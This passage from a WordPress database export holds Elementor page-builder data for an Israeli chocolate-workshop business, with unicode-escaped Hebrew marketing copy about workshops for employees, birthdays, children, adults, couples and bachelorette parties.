\\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h3><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd. <br \\/><br \\/>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2220,424,'_elementor_edit_mode','builder'),(2221,424,'_elementor_template_type','wp-page'),(2222,424,'_elementor_version','2.7.5'),(2223,424,'_elementor_pro_version','2.7.3'),(2224,424,'_wp_page_template','elementor_header_footer'),(2225,424,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2226,424,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea 